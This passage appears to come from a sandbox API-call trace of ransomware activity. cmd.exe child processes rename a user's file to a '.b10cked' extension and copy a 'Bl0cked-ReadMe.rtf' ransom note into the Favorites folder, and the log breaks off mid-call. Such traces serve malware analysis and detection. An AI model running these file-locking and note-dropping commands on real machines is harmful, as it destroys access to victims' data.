lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.086] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.086] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0212.086] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0212.086] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0212.086] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0212.086] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0212.086] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0212.086] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0212.086] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0212.086] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.086] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f510, lpFilePart=0x20f50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f50c*="Desktop") returned 0x18 [0212.086] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.086] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f28c | out: lpFindFileData=0x20f28c) returned 0x3e0038 [0212.086] FindClose (in: hFindFile=0x3e0038 | out: hFindFile=0x3e0038) returned 1 [0212.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f28c | out: lpFindFileData=0x20f28c) returned 0x3e0038 [0212.086] FindClose (in: hFindFile=0x3e0038 | out: hFindFile=0x3e0038) returned 1 [0212.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f28c | out: lpFindFileData=0x20f28c) returned 0x3e0038 [0212.087] FindClose (in: hFindFile=0x3e0038 | out: hFindFile=0x3e0038) returned 1 [0212.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.087] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0212.087] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0212.087] GetEnvironmentStringsW () returned 0x3e2b18* [0212.087] FreeEnvironmentStringsW (penv=0x3e2b18) returned 1 [0212.087] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.087] GetConsoleOutputCP () returned 0x1b5 [0212.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.087] GetUserDefaultLCID () returned 0x409 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f650, cchData=128 | out: lpLCData="0") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f650, cchData=128 | out: lpLCData="0") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f650, cchData=128 | out: lpLCData="1") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0212.088] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.089] GetConsoleTitleW (in: lpConsoleTitle=0x3d08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.089] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.089] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0212.089] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0212.089] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0212.090] _wcsicmp (_String1="move", _String2=")") returned 68 [0212.090] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0212.090] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0212.090] _wcsicmp (_String1="IF", _String2="move") returned -4 [0212.090] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0212.090] _wcsicmp (_String1="REM", _String2="move") returned 5 [0212.090] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0212.094] GetConsoleTitleW (in: lpConsoleTitle=0x20f348, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.094] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0212.094] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0212.094] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0212.094] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0212.094] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0212.094] _wcsicmp (_String1="move", _String2="CD") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="REN") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0212.095] _wcsicmp (_String1="move", _String2="SET") returned -6 [0212.095] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0212.095] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0212.095] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0212.095] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0212.095] _wcsicmp (_String1="move", _String2="MD") returned 11 [0212.095] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0212.095] _wcsicmp (_String1="move", _String2="RD") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0212.095] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0212.095] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0212.095] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0212.095] _wcsicmp (_String1="move", _String2="VER") returned -9 [0212.095] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0212.095] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0212.095] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0212.095] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0212.095] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0212.095] _wcsicmp (_String1="move", _String2="START") returned -6 [0212.095] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0212.095] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0212.095] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0212.097] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.097] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.097] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f104, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f0fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f0fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0212.098] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0212.098] _wcsicmp (_String1="IEADD-~1.URL", _String2=".") returned 59 [0212.098] _wcsicmp (_String1="IEADD-~1.URL", _String2="..") returned 59 [0212.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ieadd-~1.url")) returned 0x20 [0212.098] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.099] SetErrorMode (uMode=0x0) returned 0x0 [0212.099] SetErrorMode (uMode=0x1) returned 0x0 [0212.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", nBufferLength=0x104, lpBuffer=0x20ea8c, lpFilePart=0x20ea74 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", lpFilePart=0x20ea74*="IEADD-~1.URL") returned 0x2f [0212.099] SetErrorMode (uMode=0x0) returned 0x1 [0212.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x10 [0212.099] _wcsicmp (_String1="IEADD-~1.URL", _String2=".") returned 59 [0212.099] _wcsicmp (_String1="IEADD-~1.URL", _String2="..") returned 59 [0212.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ieadd-~1.url")) returned 0x20 [0212.099] SetErrorMode (uMode=0x0) returned 0x0 [0212.099] SetErrorMode (uMode=0x1) returned 0x0 [0212.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", nBufferLength=0x104, lpBuffer=0x20ef08, lpFilePart=0x20eca0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", lpFilePart=0x20eca0*="IEADD-~1.URL") returned 0x2f [0212.099] SetErrorMode (uMode=0x0) returned 0x1 [0212.099] SetErrorMode (uMode=0x0) returned 0x0 [0212.099] SetErrorMode (uMode=0x1) returned 0x0 [0212.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f110, lpFilePart=0x20eca0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked", lpFilePart=0x20eca0*="IE Add-on site.url.b10cked") returned 0x3d [0212.099] SetErrorMode (uMode=0x0) returned 0x1 [0212.099] SetLastError (dwErrCode=0x0) [0212.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url.b10cked")) returned 0xffffffff [0212.099] GetLastError () returned 0x2 [0212.099] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", fInfoLevelId=0x1, lpFindFileData=0x20e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e61c) returned 0x3d0ed0 [0212.100] FindNextFileW (in: hFindFile=0x3d0ed0, lpFindFileData=0x20e61c | out: lpFindFileData=0x20e61c) returned 0 [0212.100] GetLastError () returned 0x12 [0212.100] FindClose (in: hFindFile=0x3d0ed0 | out: hFindFile=0x3d0ed0) returned 1 [0212.101] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", fInfoLevelId=0x1, lpFindFileData=0x3e1c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1c20) returned 0x3d0ed0 [0212.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked", nBufferLength=0x104, lpBuffer=0x20e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked", lpFilePart=0x0) returned 0x3d [0212.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url", nBufferLength=0x104, lpBuffer=0x20e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url", lpFilePart=0x0) returned 0x35 [0212.101] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url")) returned 0x20 [0212.101] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url.b10cked"), dwFlags=0x3) returned 1 [0212.102] FindClose (in: hFindFile=0x3d0ed0 | out: hFindFile=0x3d0ed0) returned 1 [0212.102] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e868 | out: _Buffer=" 1") returned 9 [0212.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.102] GetFileType (hFile=0x7) returned 0x2 [0212.459] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0212.459] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e7f4 | out: lpMode=0x20e7f4) returned 1 [0212.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.459] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e828 | out: lpConsoleScreenBufferInfo=0x20e828) returned 1 [0212.459] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0212.460] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e868 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0212.460] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e84c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e84c*=0x1a) returned 1 [0212.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.460] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.460] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.460] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.460] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.461] SetConsoleInputExeNameW () returned 0x1 [0212.461] GetConsoleOutputCP () returned 0x1b5 [0212.461] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.461] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.461] exit (_Code=0) Process: id = "519" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31194 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31195 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31196 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31197 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31198 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31199 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31200 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31201 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31202 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31203 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31214 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31215 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31216 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31217 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 31218 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 31219 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31220 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31221 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31222 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31223 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31224 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31225 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31226 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31228 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 31229 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31231 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31232 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31233 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31234 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31235 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 31236 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 31237 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 720 os_tid = 0x848 [0212.029] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe1c | out: lpSystemTimeAsFileTime=0x2afe1c*(dwLowDateTime=0xb331a1a0, dwHighDateTime=0x1d440a9)) [0212.029] GetCurrentProcessId () returned 0x248 [0212.029] GetCurrentThreadId () returned 0x848 [0212.029] GetTickCount () returned 0x3b79b [0212.029] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe14 | out: lpPerformanceCount=0x2afe14*=26881802174) returned 1 [0212.029] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0212.029] __set_app_type (_Type=0x1) [0212.029] __p__fmode () returned 0x76b331f4 [0212.029] __p__commode () returned 0x76b331fc [0212.030] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0212.030] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0212.030] GetCurrentThreadId () returned 0x848 [0212.030] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x848) returned 0x38 [0212.030] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.030] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0212.030] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.030] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afdac | out: phkResult=0x2afdac*=0x0) returned 0x2 [0212.030] VirtualQuery (in: lpAddress=0x2afde3, lpBuffer=0x2afd7c, dwLength=0x1c | out: 